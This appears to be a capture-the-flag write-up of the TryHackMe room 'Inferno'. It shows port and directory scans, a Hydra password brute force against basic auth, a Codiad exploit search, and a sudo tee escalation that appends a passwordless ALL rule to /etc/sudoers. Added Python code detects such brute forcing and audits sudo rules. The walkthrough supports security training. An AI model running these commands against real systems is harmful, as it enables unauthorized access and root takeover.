TryHackMe | Inferno

I recently completed the TryHackMe room Inferno.  This was a medium-rated room and I think that was a pretty accurate rating.

I started this capture the flag room the same as any other, with a port scan using the nmap tool.

gareth@enso:~/Desktop/Files/Inferno$ nmap -F 10.10.170.49 -oN inferno.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-13 21:28 CEST
Nmap scan report for 10.10.170.49
Host is up (0.039s latency).
Not shown: 97 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
106/tcp open  pop3pw

I could see there was a web server running on port 80, so I decided to scan for any directories that may be hidden.  My initial scan using the common.txt wordlist returned nothing of interest, so I tried again with the medium directory list.  This turned up a directory that was protected by basic authentication, called inferno.

gareth@enso:~/Desktop/Files/Inferno$ gobuster dir -u http://10.10.170.49 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.170.49
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/13 21:31:58 Starting gobuster in directory enumeration mode
===============================================================
/inferno              (Status: 401) [Size: 459]

I then used Hydra to crack the password to this area, assuming the default username of 'admin' was the one used.  Luckily this assumption paid off and I gained access to the area.

gareth@enso:~/Desktop/Files/Inferno$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 10.10.170.49 http-get /inferno -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-13 21:34:33
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.170.49:80/inferno
[80][http-get] host: 10.10.170.49   login: admin   password: <redacted>
[STATUS] attack finished for 10.10.170.49 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-13 21:35:28
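Seen from the web server, the Hydra run above is a burst of 401 responses from one client against one path, followed by a 200 once a valid pair is found. The following is an added example, not code from the original write-up: it parses combined-format access log lines (constructed sample data, including the 10.8.0.99 address) and flags that pattern.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: one ordinary client, then a client hammering the
# basic-auth protected /inferno directory with 25 failures and one success.
GUESSER = "10.8.0.99"  # constructed address, not from the room
SAMPLE_LOG = [
    '10.10.10.5 - - [13/Aug/2021:21:30:01 +0000] "GET / HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
    '10.10.10.5 - - [13/Aug/2021:21:30:02 +0000] "GET /inferno HTTP/1.1" 401 459 "-" "curl/7.68.0"',
] + [
    f'{GUESSER} - - [13/Aug/2021:21:34:{s:02d} +0000] "GET /inferno HTTP/1.1" 401 459 "-" "Mozilla/5.0"'
    for s in range(33, 58)
] + [
    f'{GUESSER} - - [13/Aug/2021:21:35:28 +0000] "GET /inferno HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_bruteforce(lines, threshold=10):
    """Map (client, path) -> {"failures": n, "succeeded": bool} for every client
    that collected at least `threshold` 401s on one path. `succeeded` is set when
    the same client later gets a 200 on that path, i.e. a valid pair was found."""
    stats = defaultdict(lambda: {"failures": 0, "succeeded": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        if rec["status"] == "401":
            stats[key]["failures"] += 1
        elif rec["status"] == "200" and stats[key]["failures"] > 0:
            stats[key]["succeeded"] = True
    return {k: v for k, v in stats.items() if v["failures"] >= threshold}


if __name__ == "__main__":
    for (ip, path), v in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip} -> {path}: {v['failures']} failed logins, succeeded={v['succeeded']}")
```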

Codiad

[Screenshot: This looks like a login for something called Codiad?]

I was presented with a login form for what looked like a tool called "Codiad".  I searched for an exploit for Codiad using searchsploit and found the following.

gareth@enso:~/Desktop/Files/Inferno$ searchsploit Codiad
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities                   | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion                       | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated)      | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)  | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)  | multiple/webapps/49907.py
---------------------------------------------------------- ---------------------------------

Because these exploits required the user to be authenticated, I tried to reuse the credentials from the basic authentication.  This proved successful and I was able to log in.

After some trial and error with these I could not get any of them to work, so I instead decided to search GitHub and came across a repository that contained an exploit for Codiad which I managed to get working.

I was able to get a reverse shell on the machine by following the instructions in the exploit file.

[Screenshot: Took 3 panes to get a reverse shell]

Foothold

Now I had a foothold on the server, it was time to enumerate.  I eventually found an interesting file in the /home/dante/Downloads directory, called .download.dat, which contained what looked like hexadecimal.  I used CyberChef to convert this hexadecimal to ASCII and was presented with the following:

«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.

«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.

Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.

Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».

dante:<redacted>

With the credentials at the bottom I was able to access the server via SSH as the dante user and capture the user flag, which was hidden in the local.txt file in the home directory.

gareth@enso:~/Desktop/Files/Inferno$ ssh dante@10.10.170.49
dante@10.10.170.49's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-130-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Aug 13 20:11:10 UTC 2021

  System load:  0.0               Processes:           1198
  Usage of /:   42.0% of 8.79GB   Users logged in:     0
  Memory usage: 61%               IP address for eth0: 10.10.170.49
  Swap usage:   0%


39 packages can be updated.
0 updates are security updates.


Last login: Fri Aug 13 20:10:56 2021 from 10.8.145.210
dante@Inferno:~$ cat local.txt

Privilege Escalation

From running the command sudo -l, I could see that the dante user has permission to run the tee command as sudo.

dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee

A quick check on GTFOBins showed me how to use this command to gain write access to any file on the file system.

LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"

I used this to add the dante user to the /etc/sudoers file, and to allow him to run any command as sudo without a password.  From there I was able to spawn a root shell and capture the root flag.

dante@Inferno:~$ LFILE=/etc/sudoers
dante@Inferno:~$ echo "dante ALL=(root) NOPASSWD: ALL" | sudo tee -a "$LFILE"
dante ALL=(root) NOPASSWD: ALL
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
    (root) NOPASSWD: ALL
dante@Inferno:~$ sudo su
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls
proof.txt
root@Inferno:~# cat proof.txt
Congrats!

You've rooted Inferno!

<redacted>

mindsflee
root@Inferno:~#
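The two sudo -l listings above are exactly what a sudoers audit should catch: a passwordless rule for a binary that writes arbitrary files as root, and then the unrestricted rule it was used to append. This added example (not part of the original write-up) parses that sudo -l output format and reports both; the binary sets are a small constructed subset of what GTFOBins lists, and the BEFORE/AFTER texts are constructed copies of the listings shown above.

```python
import os
import re

# Constructed subset of binaries GTFOBins lists as sudo escapes: the first set
# can write arbitrary files as root (tee is the one from this room), the second
# can spawn a root shell directly.
FILE_WRITE_BINS = {"tee", "dd", "cp", "mv"}
SHELL_BINS = {"bash", "sh", "vim", "vi", "less", "find", "awk", "python3", "perl"}

# One rule line as printed by `sudo -l`: "(runas) TAG: TAG: command".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

# Constructed copies of the two `sudo -l` outputs shown in the write-up.
BEFORE = """\
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
"""
AFTER = BEFORE + "    (root) NOPASSWD: ALL\n"


def parse_sudo_l(text):
    """Return [(runas, {tags}, command)] for the rules listed after the
    'may run the following commands' header; Defaults lines are ignored."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append((m.group("runas"), tags, m.group("cmd")))
    return rules


def audit(text):
    """Return (severity, command, reason) findings for dangerous rules."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        nopw = " without a password" if "NOPASSWD" in tags else ""
        binary = os.path.basename(cmd.split()[0])
        if cmd == "ALL":
            findings.append(("critical", cmd, f"any command as {runas}{nopw}"))
        elif binary in FILE_WRITE_BINS:
            findings.append(("high", cmd, f"writes any file as {runas}{nopw}, enough to edit /etc/sudoers"))
        elif binary in SHELL_BINS:
            findings.append(("high", cmd, f"spawns a shell as {runas}{nopw}"))
    return findings
```

Running audit() over the output of `sudo -l -U <user>` for each account is a cheap periodic check for rules like the one this room relied on.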

Summary

This room took a bit of time to gain a foothold, due to me not being familiar with Codiad and spending a lot of time trying to find an exploit for it that actually worked.  The reverse shell gained from the exploit found on GitHub was a bit flaky so I had to enumerate quickly.  I was thankful this room contained a step where I obtained the SSH user password so I could gain a more stable connection.

Thankfully the privilege escalation on this one was quite straightforward due to some poor configuration on the server and the great resource that is GTFOBins.